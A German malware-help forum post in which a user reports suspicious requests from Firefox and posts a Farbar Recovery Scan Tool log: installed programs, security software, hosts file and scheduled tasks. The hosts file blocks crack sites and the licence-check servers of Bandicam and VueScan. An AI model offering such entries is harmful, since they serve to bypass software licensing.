Zurück   Trojaner-Board > Malware entfernen > Log-Analyse und Auswertung

Log-Analyse und Auswertung: Windows 8.1 + Firefox 38.0.1: Request an Malware-gelistete Seite bei Aufruf von beliebiger Website

Windows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.

Antwort
Alt 27.05.2015, 11:01   #1
RAnders00
 
Windows 8.1 + Firefox 38.0.1: Request an Malware-gelistete Seite bei Aufruf von beliebiger Website - Standard

Windows 8.1 + Firefox 38.0.1: Request an Malware-gelistete Seite bei Aufruf von beliebiger Website



Ich habe folgendes festgestellt:
Als ich in der Konsole des Firefox (38.0.1) war, fiel mir auf, dass nach Ende der Ladezeit einer Website ein HTTP GET Request an eine Seite gesendet wurde, die von Bitdefender Total Security 2015 blockiert wurde. So in etwa sieht das aus (in diesem Fall rufe ich die vertrauenswürdige Seite Wolfram|Alpha auf):


Dieses "Dealdo" (kommt in der Adresse vor) scheint ein dubioser Erotik-Online-Shop zu sein. (Ich habe nur die Facebook-Seite besucht)

Hier eine Liste meiner Firefox Addons und Plugins: https://imgur.com/a/G8AbP

Addition.txt
Code:
ATTFilter
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 26-05-2015
Ran by Ruben at 2015-05-27 11:23:48
Running from C:\Users\Ruben\Downloads
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-2798130160-1945478871-1923780282-500 - Administrator - Disabled)
Gast (S-1-5-21-2798130160-1945478871-1923780282-501 - Limited - Disabled)
Ruben (S-1-5-21-2798130160-1945478871-1923780282-1001 - Administrator - Enabled) => C:\Users\Ruben

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Bitdefender Antivirus (Enabled - Up to date) {9A0813D8-CED6-F86B-072E-28D2AF25A83D}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Bitdefender Spyware-Schutz (Enabled - Up to date) {2169F23C-E8EC-F7E5-3D9E-13A0D4A2E280}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Bitdefender Firewall (Enabled) {A23392FD-84B9-F933-2C71-81E751F6EF46}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-2798130160-1945478871-1923780282-1001\...\uTorrent) (Version: 3.4.2.39744 - BitTorrent Inc.)
7-Zip 9.38 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0938-000001000000}) (Version: 9.38.00.0 - Igor Pavlov)
Adobe Flash Player 17 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 17.0.0.188 - Adobe Systems Incorporated)
Apple Application Support (32-Bit) (HKLM-x32\...\{447CDCE5-F555-429B-BFA6-642C3C6D684F}) (Version: 3.1.2 - Apple Inc.)
Apple Application Support (64-Bit) (HKLM\...\{0DF7096B-715A-4233-8633-C7A16ED6D616}) (Version: 3.1.2 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{C4123106-B685-48E6-B9BD-E4F911841EB4}) (Version: 8.1.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Bandicam (HKLM-x32\...\Bandicam) (Version: 2.1.3.757 - Bandisoft.com)
Bandisoft MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version:  - Bandisoft.com)
Bitdefender Total Security 2015 (HKLM\...\Bitdefender) (Version: 18.21.0.1497 - Bitdefender)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.04 - Piriform)
Curse (HKLM-x32\...\{1F2611FB-6F69-4AA8-BECD-243BD8CB45F3}) (Version: 6.0.0.0 - Curse)
DB Browser for SQLite (HKLM-x32\...\SqliteBrowser3) (Version: 3.5.1 - oldsch00l)
DisplayFusion 7.1 (HKLM-x32\...\B076073A-5527-4f4f-B46B-B10692277DA2_is1) (Version: 7.1.0.0 - Binary Fortress Software)
Dropbox (HKU\S-1-5-21-2798130160-1945478871-1923780282-1001\...\Dropbox) (Version: 3.4.6 - Dropbox, Inc.)
Druckerdeinstallation für EPSON PX710W Series (HKLM\...\EPSON PX710W Series) (Version:  - SEIKO EPSON Corporation)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - )
FDUx86 (x32 Version: 1.0.0 - Sony Corporation) Hidden
FileZilla Client 3.11.0.1 (HKLM-x32\...\FileZilla Client) (Version: 3.11.0.1 - Tim Kosse)
Finale 2014d DEMO (HKLM-x32\...\Finale 2014) (Version: 2014.4.5030.2 - MakeMusic)
Finale NotePad 2012 (HKLM-x32\...\Finale NotePad 2012) (Version: 2012..r1.1 - MakeMusic)
Foxit Cloud (HKLM-x32\...\{41914D8B-9D6E-4764-A1F9-BC43FB6782C1}_is1) (Version: 3.4.96.511 - Foxit Software Inc.)
Foxit PhantomPDF Standard (HKLM-x32\...\{365A8436-22A8-47BF-B1B9-6A6CDAA465CE}) (Version: 7.0.8.1216 - Foxit Software Inc.)
Foxit Reader (HKLM-x32\...\Foxit Reader_is1) (Version: 7.0.8.1216 - Foxit Software Inc.)
Genymotion version 2.4.0 (HKLM\...\{6D180286-D4DF-40EF-9227-923B9C07C08A}_is1) (Version: 2.4.0 - Genymobile)
GIMP 2.8.14 (HKLM\...\GIMP-2_is1) (Version: 2.8.14 - The GIMP Team)
Git version 1.9.5-preview20150319 (HKLM-x32\...\Git_is1) (Version: 1.9.5-preview20150319 - The Git Development Community)
HexChat (HKLM\...\HexChat_is1) (Version: 2.10.2 - HexChat)
iExplorer 3.7.3.0 (HKLM-x32\...\{7FD8B0C1-CDDA-4B4D-A577-B2E3570EA3A3}_is1) (Version:  - Macroplant LLC)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.0.1016 - Intel Corporation)
IntelliJ IDEA Community Edition 14.1.3 (HKLM-x32\...\IntelliJ IDEA Community Edition 14.1.3) (Version: 141.1010.3 - JetBrains s.r.o.)
iTunes (HKLM\...\{D227565A-0033-40AD-89BA-653A205CDC11}) (Version: 12.1.1.4 - Apple Inc.)
Java SE Development Kit 8 Update 45 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0180450}) (Version: 8.0.450.14 - Oracle Corporation)
JetBrains PhpStorm 8.0.3 (HKLM-x32\...\PhpStorm 8.0.3) (Version: 139.1348 - JetBrains s.r.o.)
Jitsi (HKLM-x32\...\{DBA37B35-10E9-484D-8AF6-2BB1FC734590}) (Version: 2.8.5426 - Jitsi)
Macrium Reflect Free Edition (HKLM\...\MacriumReflect) (Version: 5.3 - Paramount Software (UK) Ltd.)
Macrium Reflect Free Edition (Version: 5.3.7290 - Paramount Software (UK) Ltd.) Hidden
Magic MP3 Tagger 2.2.6 (HKLM-x32\...\uniquemagicmp3taggerappid_is1) (Version:  - Mathias Kunter)
MediaMonkey 4.1 (HKLM-x32\...\MediaMonkey_is1) (Version: 4.1 - Ventis Media Inc.)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 - de-de (HKLM\...\ProPlusRetail - de-de) (Version: 15.0.4719.1002 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2798130160-1945478871-1923780282-1001\...\OneDriveSetup.exe) (Version: 17.3.5860.0512 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40416.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio 2010-Tools für Office-Laufzeit (x64) Language Pack - DEU (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - DEU) (Version: 10.0.50903 - Microsoft Corporation)
Mozilla Firefox 38.0.1 (x86 de) (HKLM-x32\...\Mozilla Firefox 38.0.1 (x86 de)) (Version: 38.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 36.0.4 - Mozilla)
Networkx64 (Version: 1.0.0 - Sony Corporation) Hidden
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.7.8.2 - Notepad++ Team)
NVIDIA 3D Vision Treiber 352.86 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 352.86 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.4.3.31 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.4.3.31 - NVIDIA Corporation)
NVIDIA Grafiktreiber 352.86 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 352.86 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.34.3 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.3 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4719.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4719.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4719.1002 - Microsoft Corporation) Hidden
Oracle VM VirtualBox 4.3.26 (HKLM\...\{5771F59A-BFC9-4FAF-A883-7642EF4BA3C3}) (Version: 4.3.26 - Oracle Corporation)
PDFCreator (HKLM\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 2.1.0 - pdfforge)
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.1.312 - Qualcomm Atheros Communications)
QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6695 - Realtek Semiconductor Corp.)
Restore (x32 Version: 1.0.0 - Sony Corporation) Hidden
SCS Shortcut (x32 Version: 1.0 - Sony Creative Software Inc.) Hidden
ShareX 9.10.1 (HKLM\...\82E6AC09-0FEF-4390-AD9F-0DD3F5561EFC_is1) (Version: 9.10.1 - ShareX Developers)
SHIELD Streaming (Version: 4.1.1000 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.4.3.31 - NVIDIA Corporation) Hidden
Skype™ 7.2 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.2.103 - Skype Technologies S.A.)
SSLx64 (Version: 1.0.0 - Sony Corporation ) Hidden
SSLx86 (x32 Version: 1.0.0 - Sony Corporation ) Hidden
Start Menu 8 (HKLM-x32\...\IObit_StartMenu8_is1) (Version: 2.2.0 - IObit)
SuperD spd2900gs (HKLM-x32\...\{B4D7DF2F-5FD7-4908-A098-298CE9898A8D}) (Version: 1.0.2102.1004 - SuperD Co., Ltd.)
SuperD X-Tune (HKLM-x32\...\{2730EB73-8EEF-447F-82A0-16497631386A}) (Version: 1.0.2101.1003 - SuperD Co., Ltd.)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH)
TeamViewer 10 (HKLM-x32\...\TeamViewer) (Version: 10.0.41459 - TeamViewer)
Ultra Defragmenter (HKLM-x32\...\UltraDefrag) (Version: 6.0.4 - UltraDefrag Development Team)
VAIO Care (HKLM\...\{EF649526-0134-46A8-8DF3-D7F9309E48DB}) (Version: 8.4.2.12046 - Sony Corporation)
VAIO Care Recovery (HKLM\...\{15B9204E-BA09-485E-8F2C-094AC0077664}) (Version: 1.1.2.13230 - Sony Corporation)
VAIO Care-Hardwarediagnose-Plugin (HKLM-x32\...\{EC153498-00E1-4C9C-89BE-81527C6750BE}) (Version: 4.11.1.11220 - Sony Corporation)
VAIO Control Center (HKLM-x32\...\{8E797841-A110-41FD-B17A-3ABC0641187A}) (Version: 6.0.0.08280 - Sony Corporation)
VAIO Data Restore Tool (HKLM-x32\...\{57B955CE-B5D3-495D-AF1B-FAEE0540BFEF}) (Version: 1.10.0.07270 - Sony Corporation)
VAIO Easy Connect (x32 Version: 8.2.0.14170 - Sony Corporation) Hidden
VAIO Gesture Control (HKLM-x32\...\{692955F2-DE9F-4078-8FAA-858D6F3A1776}) (Version: 2.0.0.08240 - Sony Corporation)
VAIO Gesture Control (x32 Version: 2.0.0.08240 - Sony Corporation) Hidden
VAIO Improvement (HKLM-x32\...\{3A26D9BD-0F73-432D-B522-2BA18138F7EF}) (Version: 2.0.0.08090 - Sony Corporation)
VAIO Media Server Settings (HKLM\...\{62A172B2-550E-499D-9A82-5190D18390AA}) (Version: 1.0.2.11060 - Sony Corporation)
VAIO Update (HKLM-x32\...\{9FF95DA2-7DA1-4228-93B7-DED7EC02B6B2}) (Version: 7.0.1.02280 - Sony Corporation)
VAIO*CPU-Lüfterdiagnose (HKLM-x32\...\{BCE6E3D7-B565-4E1B-AC77-F780666A35FB}) (Version: 1.1.0.09200 - Sony Corporation)
VAIO-Handbuch (HKLM-x32\...\{C6E893E7-E5EA-4CD5-917C-5443E753FCBD}) (Version: 3.0.0.08100 - Sony Corporation)
VAIO-Support für Übertragungen (HKLM-x32\...\{5DDAFB4B-C52E-468A-9E23-3B0CEEB671BF}) (Version: 1.8.0.08212 - Sony Corporation)
VCCx64 (Version: 1.0.0 - Sony Corporation) Hidden
VCCx86 (x32 Version: 1.0.0 - Sony Corporation) Hidden
VHD (x32 Version: 1.0.0 - Sony Corporation) Hidden
VIx64 (Version: 1.0.0 - Sony Corporation) Hidden
VIx86 (x32 Version: 1.0.0 - Sony Corporation) Hidden
VLC media player (HKLM\...\VLC media player) (Version: 2.2.0 - VideoLAN)
VMLx86 (x32 Version: 1.0.0 - Sony Corporation) Hidden
VPMx64 (Version: 1.0.0 - Sony Corporation ) Hidden
VSSTx64 (Version: 1.0.0 - Sony Corporation ) Hidden
VSSTx86 (x32 Version: 1.0.0 - Sony Corporation) Hidden
VU5x64 (Version: 1.1.0 - Sony Corporation ) Hidden
VU5x86 (x32 Version: 1.1.0 - Sony Corporation ) Hidden
VueScan x64 (HKLM\...\VueScan x64) (Version:  - )
VWSTx86 (x32 Version: 1.0.0 - Sony Corporation) Hidden
Wireshark 1.12.5 (64-bit) (HKLM-x32\...\Wireshark) (Version: 1.12.5 - The Wireshark developer community, hxxp://www.wireshark.org)
XAMPP (HKLM-x32\...\xampp) (Version: 5.6.8-0 - Bitnami)
X-Lite (HKLM-x32\...\{8698D30E-8FFC-4BCD-A13A-3DAB86C0D42E}) (Version: 48.7.6464 - CounterPath Corporation)
XMedia Recode Version 3.2.2.4 (HKLM-x32\...\{DDA3C325-47B2-4730-9672-BF3771C08799}_is1) (Version: 3.2.2.4 - XMedia Recode)
X-Mouse Button Control 2.10.2 (HKLM-x32\...\X-Mouse Button Control) (Version: 2.10.2 - Highresolution Enterprises)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{654a14c2-f1da-4026-b8f4-6e6dac64644c}\InprocServer32 -> C:\WINDOWS\system32\dfshim.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{ca586c80-7c84-4b88-8537-726724df6929}\InprocServer32 -> C:\Program Files (x86)\Git\git-cheetah\git_shell_ext64.dll ()
CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\Ruben\AppData\Local\Microsoft\OneDrive\17.3.5860.0512\amd64\FileSyncApi64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)

==================== Restore Points =========================

13-05-2015 07:25:51 Windows Update
18-05-2015 12:03:04 Removed Java 8 Update 45
23-05-2015 18:10:19 Installed Jitsi

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 15:25 - 2015-04-15 17:49 - 00001550 ____A C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1                   onhax.net
127.0.0.1                   www.onhax.net
127.0.0.1                   forum.onhax.net
127.0.0.1                   https://forum.onhax.net
127.0.0.1                   labs.onhax.net
127.0.0.1                   do2dear.net
127.0.0.1                   p30world.com
127.0.0.1                   brarstuff.com
127.0.0.1                   rsload.net
127.0.0.1                   bandicam.com
127.0.0.1                   ssl.bandisoft.com
127.0.0.1                   idm-crack-patch.blogspot.in
127.0.0.1                   parth8641.blogspot.com
127.0.0.1                   www.hamrick.com
127.0.0.1                   static.hamrick.com
127.0.0.1                   stats.hamrick.com


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {03C91028-657D-4423-ACB7-5B756163654A} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2015-05-14] (Microsoft Corporation)
Task: {0B28ACAA-4BDE-435A-82C4-3D97F02769E5} - System32\Tasks\Microsoft Office 15 Sync Maintenance for RubensVaio-Ruben RubensVaio => C:\Program Files\Microsoft Office 15\Root\Office15\MsoSync.exe [2015-03-10] (Microsoft Corporation)
Task: {1E57804B-1ED4-4D5D-9106-B4AF2F176224} - System32\Tasks\Sony Corporation\VAIO Update\VAIO Update => C:\Program Files\Sony\VAIO Update\VAIOUpdt.exe [2014-02-28] (Sony Corporation)
Task: {20861EEF-3A03-42F4-A838-FDC40C7C9A12} - System32\Tasks\Microsoft\Windows\Setup\gwx\refreshgwxconfig => C:\Windows\system32\GWX\GWXConfigManager.exe [2015-03-24] (Microsoft Corporation)
Task: {24A595BD-D1B1-4EFA-A1E8-8CAECF20EB42} - System32\Tasks\USER_ESRV_SVC => Wscript.exe //B //NoLogo "C:\Program Files\Sony\VAIO Care\ESRV\task.vbs"
Task: {271304AE-4247-4B0B-85EA-0AC3419AB74D} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-05-19] (Adobe Systems Incorporated)
Task: {32CA79B8-D216-44F2-AEAB-903ADF0C94C8} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2015-04-14] (Microsoft Corporation)
Task: {3321A6D4-11EA-46DB-9302-9168FFCACFE3} - System32\Tasks\Sony Corporation\VAIO Care\VCCheckIolo => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation)
Task: {355229AC-40E8-4FB5-B14C-47DDAE6BB1BF} - System32\Tasks\Sony Corporation\VAIO Care\VAIO Care => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation)
Task: {4BBBB335-FA93-441D-B6C2-36D9AB317B37} - System32\Tasks\Sony Corporation\VAIO Care\VCMetrics => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation)
Task: {51D843BE-4E3A-4A98-985D-8C4CF538B8DD} - System32\Tasks\Sony Corporation\VAIO Care\UpdateSolution => C:\Program Files\Sony\VAIO Care\Solution.Updater.exe [2014-12-03] (Sony Corporation)
Task: {61130F71-8742-45D6-A4E1-FB637B1921F6} - System32\Tasks\Sony Corporation\VAIO Gesture Control\VCGULogonTask => C:\Program Files (x86)\Sony\VAIO Camera Gesture Utility\VCGU.exe [2012-08-04] (Sony Corporation)
Task: {6FE63A85-9C0B-4320-84A4-CD51083C79B6} - System32\Tasks\Microsoft\Windows\Setup\gwx\refreshgwxcontent => C:\Windows\system32\GWX\GWXConfigManager.exe [2015-03-24] (Microsoft Corporation)
Task: {765339AF-3C12-49A4-B1BC-933BD59B9334} - System32\Tasks\Microsoft\Windows\Setup\gwx\launchtrayprocess => C:\Windows\system32\GWX\GWX.exe [2015-03-24] (Microsoft Corporation)
Task: {77F73AB1-2BF9-4BAF-B6FD-9403F07EDAFA} - System32\Tasks\Sony Corporation\VAIO Control Center\NetworkSetting\NetworkSetting Logon Start => C:\Program Files (x86)\Sony\VAIO Control Center\NetworkSetting\NetworkClient
Task: {7A27FD2C-4200-4E77-B499-56228EAEDD03} - System32\Tasks\Sony Corporation\VAIO Care\VCOneClick => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation)
Task: {8F0B6E2A-D772-4017-963D-4D2B18A70033} - System32\Tasks\Sony Corporation\VAIO Improvement\VAIOImprovementMonitorSystem => C:\Program Files\Sony\VAIO Improvement\vim.exe [2013-04-03] (Sony Corporation)
Task: {952CBAA9-3887-4259-BA73-862AF0AEF16D} - System32\Tasks\Microsoft_Hardware_Launch_IPoint_exe => c:\Program Files\Microsoft IntelliPoint\IPoint.exe
Task: {95B5A631-5805-4407-96E9-9C6776689825} - System32\Tasks\Sony Corporation\VAIO Improvement\VAIOImprovementUploader => C:\Program Files\Sony\VAIO Improvement\viuploader.exe [2012-08-09] (Sony Corporation)
Task: {A2EA898B-2E09-4C82-9C64-8EED1FF1DF6E} - System32\Tasks\Sony Corporation\VAIO Care\ActiveStatusCollect => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation)
Task: {A9781B7B-C893-443A-82EB-A9FDEE6000B3} - System32\Tasks\Sony Corporation\VAIO Care\DeployCRMflag => C:\Program Files\Sony\VAIO Care\DeployCRMflag.exe [2014-01-16] (Sony Corporation)
Task: {AB90CD73-64F5-45CA-93CD-9DB6BD1E1F1F} - System32\Tasks\update-S-1-5-21-2798130160-1945478871-1923780282-1001 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [2014-11-28] ()
Task: {ACA7E4BC-9D11-4DAC-9C89-915E7E92ACD2} - System32\Tasks\Sony Corporation\VAIO Care\CheckSystemInfo => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation)
Task: {BAD4621D-A636-4B10-9785-ABE52CB0FBF2} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2015-04-14] (Microsoft Corporation)
Task: {C5081CD6-0561-4F2B-8689-285F9C321092} - System32\Tasks\Microsoft OneDrive Auto Update Task-S-1-5-21-2798130160-1945478871-1923780282-1001 => %localappdata%\Microsoft\OneDrive\OneDrive.exe
Task: {C74A71A1-C1F8-4912-A221-88E2A38C3007} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-03-13] (Piriform Ltd)
Task: {CB31D35B-2569-4CAE-8356-147FCE026D6F} - System32\Tasks\Sony Corporation\VAIO Care\VCRLog => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation)
Task: {DDA0A5F1-6933-40B4-A7B0-F03F60881A3D} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2015-03-27] (Microsoft Corporation)
Task: {DE6EAFBD-DD25-4EFC-B75F-3545323C2F47} - System32\Tasks\Sony Corporation\VAIO Improvement\VAIOImprovementMonitorUser => C:\Program Files\Sony\VAIO Improvement\vim.exe [2013-04-03] (Sony Corporation)
Task: {DF0C1261-3171-41F3-8E1D-9D4D045C9465} - System32\Tasks\Apple Diagnostics => C:\Program Files (x86)\Common Files\Apple\Internet Services\EReporter.exe
Task: {DF9838E6-ABEF-45E6-82F6-7D9CC9B99852} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2015-03-27] (Microsoft Corporation)
Task: {E14B16FC-63D8-4C18-9CAC-39BA994EC36D} - System32\Tasks\Sony Corporation\VAIO Update\VAIO Update Self Repair => C:\Program Files\Sony\VAIO Update\VUSR.exe [2014-03-01] (Sony Corporation)
